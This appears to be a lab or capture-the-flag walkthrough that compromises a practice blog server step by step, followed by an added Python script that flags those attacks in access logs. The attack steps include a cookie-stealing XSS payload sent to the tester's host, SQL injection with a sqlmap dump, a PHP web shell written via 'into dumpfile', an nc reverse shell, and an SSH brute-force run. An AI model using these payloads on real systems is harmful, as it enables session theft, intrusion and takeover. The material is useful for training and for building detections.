Black Box - BB2 XSS from cookie: (My Blog - 10.10.1.19)
  1. Open Burp, click on options and scan the application.
    * nmap 10.10.1.19 -F (ports 80 and 22 are open)
    * nikto -h 10.10.1.19 (Apache/2.2.16 (Debian), PHP/5.3.3-7+squeeze18)


  1. As I see in the URL, there are only 2 id options:
    http://10.10.1.19/post.php?id=1
    http://10.10.1.19/post.php?id=2
    The third id option is an error: ERROR: INTEGER REQUIRED.


  2. On the pages for id 1 or 2 there is a form that can be tested for XSS. Choose an ID and check the form: the step is to look for the injection point, fill in the form and check the response.



  3. ID number 3 comes back, which means the injection point is in the Text box.
  4. Try to insert a script inside. There is an admin login, so try to use a cookie script to get the admin's session cookie.
    * python -m SimpleHTTPServer
    and insert a script into the text box on the page:
    * <script>new Image().src="http://10.10.10.6:8000/a.php?cookie="+encodeURI(document.cookie);</script>

  5. Copy the PHPSESSID
    PHPSESSID=5j6hmv09krd85m6j2mfkrume12
    Paste it into Tamper Data / Cookie Manager and click admin / try to log in.

  6. Check the control panel and try to edit a post.


  1. We can try SQL injection
Boolean Proof:
http://10.10.1.19/admin/edit.php?id=2%20and%201=0 False
http://10.10.1.19/admin/edit.php?id=2%20and%201=1 True


http://10.10.1.19/admin/edit.php?id=1%20union%20select%201,2,3,4
  1. Try a high id or a non-existent one, like -1 or 100, and
    check what you get:
    http://10.10.1.19/admin/edit.php?id=-1%20union%20select%201,2,3,4
  1. We would like more information, such as user(), version() and database().
  1. Use sqlmap to find the admin password. We need to pass the session cookie:
    sqlmap -u "http://10.10.1.19/admin/edit.php?id=-1" -D blog -T users --columns --cookie="PHPSESSID=4gaol0csg9ai0qva1qrb3bbfv7" --dump

    Username: admin
    Password: P4ssw0rd



We can use the function load_file("path") to read files:
load_file("/etc/passwd") or /etc/group or /etc/services
  1. Open dirbuster to view all the folders and look for a writable folder to write a file there.

  2. http://10.10.1.19/admin/edit.php?id=-1 union select "<?php system($_GET['c']);?>",2,3,4 into dumpfile '/var/www/images/text4.php'

  3. Check the file (we have a half shell).
  1. Open a session with nc for more comfortable work from the command line
    http://10.10.1.19/images/text4.php?c=nc -n 10.10.10.6 1235 -e /bin/bash


  2. After several days, I didn’t find an exploit. I hacked the user with medusa:
    medusa -u user -P rockyou.txt -h 10.10.1.19 -M ssh

The password is live.
  1. Try to log in over ssh as user@10.10.1.19 (Password: live)
  2. sudo su
  3. And I am user root!
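
Seen from the defender's side, the requests in this walkthrough (the boolean and UNION tests against edit.php, load_file, into dumpfile, and a PHP file served from /images/) all show up in the web server's access log. The script below is an added example, not part of the original walkthrough; the log lines are constructed samples and the rule names are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample lines in Apache access-log style (not captured from the lab).
SAMPLE_LOG = [
    '10.10.10.6 - - [01/Jan/2015:10:00:01 +0000] "GET /post.php?id=1 HTTP/1.1" 200 1523',
    '10.10.10.6 - - [01/Jan/2015:10:05:10 +0000] "GET /admin/edit.php?id=2%20and%201=1 HTTP/1.1" 200 980',
    '10.10.10.6 - - [01/Jan/2015:10:06:02 +0000] "GET /admin/edit.php?id=-1%20union%20select%201,2,3,4 HTTP/1.1" 200 990',
    '10.10.10.6 - - [01/Jan/2015:10:07:40 +0000] "GET /admin/edit.php?id=-1%20union%20select%20load_file(%22/etc/passwd%22),2,3,4 HTTP/1.1" 200 2100',
    '10.10.10.6 - - [01/Jan/2015:10:09:15 +0000] "GET /admin/edit.php?id=-1%20union%20select%20%22x%22,2,3,4%20into%20dumpfile%20%27/var/www/images/text4.php%27 HTTP/1.1" 200 312',
    '10.10.10.6 - - [01/Jan/2015:10:10:03 +0000] "GET /images/text4.php?c=id HTTP/1.1" 200 54',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rule names are assumptions for this example; the patterns mirror the steps above.
QUERY_RULES = {
    "sqli-boolean": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "sqli-union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "sql-file-read": re.compile(r"\bload_file\s*\(", re.I),
    "sql-file-write": re.compile(r"\binto\s+(?:dumpfile|outfile)\b", re.I),
}
# A PHP script requested from the image directory should never exist on this site.
PHP_IN_IMAGES = re.compile(r"^/images/[^?]*\.php$", re.I)


def classify(line):
    """Return the sorted rule names triggered by one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    # URL-decode, then collapse inline SQL comments and whitespace runs.
    decoded = re.sub(r"/\*.*?\*/|\s+", " ", unquote_plus(query))
    hits = [name for name, rx in QUERY_RULES.items() if rx.search(decoded)]
    if PHP_IN_IMAGES.match(unquote(path)):
        hits.append("php-in-images")
    return sorted(hits)


def scan(lines):
    """Return (line_number, rule_names) for every line that triggers a rule."""
    results = []
    for lineno, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            results.append((lineno, hits))
    return results


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(lineno, ", ".join(hits))
```

GET parameters are the only input visible in an access log, so the stored XSS submitted through the comment form would need request-body logging or a WAF to catch.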

Fabio Lior Rahamim